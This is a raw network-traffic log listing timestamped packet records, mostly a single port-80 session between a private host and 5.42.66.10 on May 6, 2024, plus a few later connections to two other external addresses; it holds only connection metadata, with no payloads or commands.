May 6, 2024 07:53:08.963850975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963864088 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963875055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963886976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963900089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963910103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963912964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963922024 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.963936090 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.963957071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964063883 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964078903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964090109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964109898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964116096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964121103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964121103 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964132071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964144945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964150906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964155912 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964168072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964179993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964184046 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964191914 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964193106 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964205980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964210033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964219093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964230061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964234114 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964241028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964252949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964257956 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964265108 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964268923 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964277029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964288950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964293957 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964301109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964320898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964323044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964329004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964334011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964354038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964355946 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964369059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964373112 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964380026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964392900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964395046 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964406967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964416027 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964420080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964431047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964437008 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964443922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964454889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964461088 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964463949 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964476109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964482069 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964498997 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964509010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964515924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964526892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964539051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964550972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964555979 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964561939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:08.964564085 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964585066 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:08.964608908 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.204946995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.204967022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.204978943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205033064 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205035925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205049038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205066919 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205105066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205117941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205128908 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205135107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205142975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205148935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205163002 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205177069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205188990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205200911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205205917 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205214977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205224991 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205225945 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205238104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205249071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205251932 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205265045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205267906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205287933 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205295086 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205302000 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205318928 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205334902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205342054 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205348969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205358982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205372095 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205389023 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205406904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205499887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205615044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205626965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205650091 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205655098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205668926 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205677032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205697060 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205713034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205715895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205733061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205764055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205775976 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205779076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205786943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205801010 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205826044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205842972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205854893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205866098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205879927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205883980 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205892086 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205903053 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205907106 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205921888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.205933094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205950975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.205974102 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.206271887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206284046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206324100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.206327915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206341028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206351995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206381083 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.206389904 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.206528902 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206541061 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206552982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206564903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206585884 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.206604958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206614971 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.206670046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206684113 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206696033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206717968 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.206728935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.206737995 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206749916 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206759930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206772089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206784010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206784964 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.206795931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206798077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.206825018 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.206847906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.206880093 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206892014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206902981 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206913948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206918955 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.206924915 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206933022 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.206938028 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.206949949 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.206976891 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.206991911 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207004070 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207015038 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207026005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207029104 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207037926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207048893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207056999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207062006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207073927 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207082033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207087040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207096100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207114935 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207137108 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207149029 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207160950 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207171917 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207182884 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207185030 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207194090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207201004 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207205057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207211971 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207218885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207230091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207242012 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207242966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207253933 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207254887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207267046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207278013 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207283020 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207289934 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207302094 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207307100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207314014 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207324982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207328081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207336903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207341909 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207349062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207362890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207362890 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207374096 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207386017 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207389116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207396984 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207405090 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207408905 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207422018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207432985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207433939 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207447052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207457066 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207458019 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207469940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207473993 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207482100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207504034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207526922 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.207839966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207948923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207961082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207973003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207984924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207994938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.207998037 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208007097 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208019018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208024979 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208044052 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208070040 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208174944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208187103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208198071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208219051 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208244085 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208322048 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208333969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208344936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208362103 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208369970 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208379030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208389044 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208393097 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208401918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208412886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208422899 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208424091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208436966 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208448887 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208448887 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208461046 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208467960 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208472967 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208484888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208494902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208497047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208509922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208522081 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208535910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208550930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208563089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208565950 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208575010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208589077 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208597898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208600998 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208609104 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208621025 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208621025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208632946 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208638906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208662033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208688021 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208690882 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208739996 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208750963 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208761930 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208774090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208779097 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208786964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208798885 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208806038 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208811045 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208817005 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208844900 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208878994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208889961 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208900928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208911896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208916903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208924055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208935022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208940983 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208941936 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208956003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208966017 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208970070 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208977938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.208983898 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.208991051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.209002018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.209007978 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.209014893 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.209027052 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.209032059 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.209038973 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:09.209043026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.209063053 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.209093094 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.209640980 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:09.463793039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:10.424674988 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:10.427100897 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:10.695005894 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:10.698785067 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:10.698947906 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:10.731057882 CEST	49732	50500	192.168.2.4	193.233.132.226
May 6, 2024 07:53:10.744235039 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:10.969779968 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:10.969826937 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:10.970299959 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:10.994431973 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:11.239703894 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.240375042 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.240386963 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:11.240398884 CEST	80	49743	193.233.132.253	192.168.2.4
